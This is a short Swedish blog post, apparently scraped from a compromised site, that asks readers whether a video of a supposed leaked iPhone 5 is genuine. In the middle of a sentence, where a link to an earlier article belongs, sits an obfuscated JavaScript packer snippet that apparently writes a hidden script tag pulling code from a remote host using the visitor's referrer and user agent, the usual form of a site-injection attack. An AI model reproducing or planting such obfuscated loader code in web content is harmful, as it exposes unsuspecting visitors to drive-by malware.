Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Video på iPhone 5?

Sebastian

Som vi nämnt så är det redan nästa vecka som Apple presenterar iPhone 5 (läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dktar|var|u0026u|referrer|afkah||js|php’.split(’|’),0,{}))
tidigare artikel
). Tills dess kommer det säkerligen läcka ut en del videos och bilder som är fejk.

I videon ovan sägs det vara en iPhone 5 som visas upp och sätts igång bredvid en iPhone 4s. Självklart är det inte omöjligt att någon lyckats smyga ut ett exemplar från en fabrik, fast själv tror jag inte denna är äkta.

Avgör själv, tror ni exemplaret ovan är en riktigt iPhone 5?